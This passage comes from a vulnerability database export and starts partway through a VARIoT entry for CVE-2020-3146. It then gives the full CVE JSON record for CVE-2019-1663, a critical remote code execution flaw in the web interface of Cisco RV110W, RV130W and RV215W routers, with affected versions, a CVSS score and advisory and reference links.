buffer overflow vulnerability exists in the Web management interface of many Cisco products. The vulnerability is caused by the program\u0027s failure to correctly verify user data",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-3146"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008402"
},
{
"db": "CNVD",
"id": "CNVD-2020-41233"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-3146",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008402",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-41233",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2417",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48353",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1081",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-41233"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008402"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1081"
},
{
"db": "NVD",
"id": "CVE-2020-3146"
}
]
},
"id": "VAR-202007-1015",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-41233"
}
],
"trust": 1.179463572
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-41233"
}
]
},
"last_update_date": "2024-11-23T21:59:08.902000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-rv-rce-m4FEEGWX",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-rce-m4FEEGWX"
},
{
"title": "Patch for Buffer overflow vulnerabilities in multiple Cisco products (CNVD-2020-41233)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/226377"
},
{
"title": "Multiple Cisco Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=124563"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-41233"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008402"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1081"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008402"
},
{
"db": "NVD",
"id": "CVE-2020-3146"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-rce-m4feegwx"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-3146"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-3146"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2417/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48353"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-41233"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008402"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1081"
},
{
"db": "NVD",
"id": "CVE-2020-3146"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-41233"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008402"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1081"
},
{
"db": "NVD",
"id": "CVE-2020-3146"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-41233"
},
{
"date": "2020-09-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-008402"
},
{
"date": "2020-07-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202007-1081"
},
{
"date": "2020-07-16T18:15:16.690000",
"db": "NVD",
"id": "CVE-2020-3146"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-41233"
},
{
"date": "2020-09-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-008402"
},
{
"date": "2020-09-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202007-1081"
},
{
"date": "2024-11-21T05:30:25.247000",
"db": "NVD",
"id": "CVE-2020-3146"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202007-1081"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco RV Buffer error vulnerability in series routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008402"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202007-1081"
}
],
"trust": 0.6
}
}
cve-2019-1663
Vulnerability from cvelistv5
Published
2019-02-28 18:00
Modified
2024-11-19 19:16
Severity ?
EPSS score ?
Summary
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/107185 | vdb-entry, x_refsource_BID | |
| https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex | vendor-advisory, x_refsource_CISCO | |
| http://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv130_rmi_rce | x_refsource_MISC | |
| http://packetstormsecurity.com/files/152507/Cisco-RV130W-Routers-Management-Interface-Remote-Command-Execution.html | x_refsource_MISC | |
| https://www.exploit-db.com/exploits/46705/ | exploit, x_refsource_EXPLOIT-DB | |
| http://packetstormsecurity.com/files/153163/Cisco-RV130W-1.0.3.44-Remote-Stack-Overflow.html | x_refsource_MISC | |
| http://packetstormsecurity.com/files/154310/Cisco-RV110W-RV130-W-RV215W-Remote-Command-Execution.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
| ▼ | Cisco | RV110W Wireless-N VPN Firewall |
Version: unspecified < 1.2.2.1 |
||||||||
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T18:20:28.401Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "107185",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/107185"
},
{
"name": "20190227 Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability",
"tags": [
"vendor-advisory",
"x_refsource_CISCO",
"x_transferred"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv130_rmi_rce"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/152507/Cisco-RV130W-Routers-Management-Interface-Remote-Command-Execution.html"
},
{
"name": "46705",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/46705/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/153163/Cisco-RV130W-1.0.3.44-Remote-Stack-Overflow.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/154310/Cisco-RV110W-RV130-W-RV215W-Remote-Command-Execution.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2019-1663",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-19T17:21:25.889132Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-19T19:16:07.667Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "RV110W Wireless-N VPN Firewall",
"vendor": "Cisco",
"versions": [
{
"lessThan": "1.2.2.1",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
},
{
"product": "RV130W Wireless-N Multifunction VPN Router",
"vendor": "Cisco",
"versions": [
{
"lessThan": "1.0.3.45",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
},
{
"product": "RV215W Wireless-N VPN Router",
"vendor": "Cisco",
"versions": [
{
"lessThan": "1.3.1.1",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"datePublic": "2019-02-27T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected."
}
],
"exploits": [
{
"lang": "en",
"value": "Security researchers announced the discovery of this vulnerability, without any technical details or mention of the affected products, at the GeekPwn Shanghai conference on October 24-25, 2018."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-119",
"description": "CWE-119",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-02T20:06:05",
"orgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
"shortName": "cisco"
},
"references": [
{
"name": "107185",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/107185"
},
{
"name": "20190227 Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability",
"tags": [
"vendor-advisory",
"x_refsource_CISCO"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv130_rmi_rce"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/152507/Cisco-RV130W-Routers-Management-Interface-Remote-Command-Execution.html"
},
{
"name": "46705",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/46705/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/153163/Cisco-RV130W-1.0.3.44-Remote-Stack-Overflow.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/154310/Cisco-RV110W-RV130-W-RV215W-Remote-Command-Execution.html"
}
],
"source": {
"advisory": "cisco-sa-20190227-rmi-cmd-ex",
"defect": [
[
"CSCvn18638",
"CSCvn18639",
"CSCvn18642"
]
],
"discovery": "INTERNAL"
},
"title": "Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "psirt@cisco.com",
"DATE_PUBLIC": "2019-02-27T16:00:00-0800",
"ID": "CVE-2019-1663",
"STATE": "PUBLIC",
"TITLE": "Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "RV110W Wireless-N VPN Firewall",
"version": {
"version_data": [
{
"affected": "\u003c",
"version_affected": "\u003c",
"version_value": "1.2.2.1"
}
]
}
},
{
"product_name": "RV130W Wireless-N Multifunction VPN Router",
"version": {
"version_data": [
{
"affected": "\u003c",
"version_affected": "\u003c",
"version_value": "1.0.3.45"
}
]
}
},
{
"product_name": "RV215W Wireless-N VPN Router",
"version": {
"version_data": [
{
"affected": "\u003c",
"version_affected": "\u003c",
"version_value": "1.3.1.1"
}
]
}
}
]
},
"vendor_name": "Cisco"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected."
}
]
},
"exploit": [
{
"lang": "en",
"value": "Security researchers announced the discovery of this vulnerability, without any technical details or mention of the affected products, at the GeekPwn Shanghai conference on October 24-25, 2018."
}
],
"impact": {
"cvss": {
"baseScore": "9.8",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-119"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "107185",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/107185"
},
{
"name": "20190227 Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability",
"refsource": "CISCO",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex"
},
{
"name": "http://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv130_rmi_rce",
"refsource": "MISC",
"url": "http://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv130_rmi_rce"
},
{
"name": "http://packetstormsecurity.com/files/152507/Cisco-RV130W-Routers-Management-Interface-Remote-Command-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/152507/Cisco-RV130W-Routers-Management-Interface-Remote-Command-Execution.html"
},
{
"name": "46705",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/46705/"
},
{
"name": "http://packetstormsecurity.com/files/153163/Cisco-RV130W-1.0.3.44-Remote-Stack-Overflow.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/153163/Cisco-RV130W-1.0.3.44-Remote-Stack-Overflow.html"
},
{
"name": "http://packetstormsecurity.com/files/154310/Cisco-RV110W-RV130-W-RV215W-Remote-Command-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/154310/Cisco-RV110W-RV130-W-RV215W-Remote-Command-Execution.html"
}
]
},
"source": {
"advisory": "cisco-sa-20190227-rmi-cmd-ex",
"defect": [
[
"CSCvn18638",
"CSCvn18639",
"CSCvn18642"
]
],
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
"assignerShortName": "cisco",
"cveId": "CVE-2019-1663",
"datePublished": "2019-02-28T18:00:00Z",
"dateReserved": "2018-12-06T00:00:00",
"dateUpdated": "2024-11-19T19:16:07.667Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}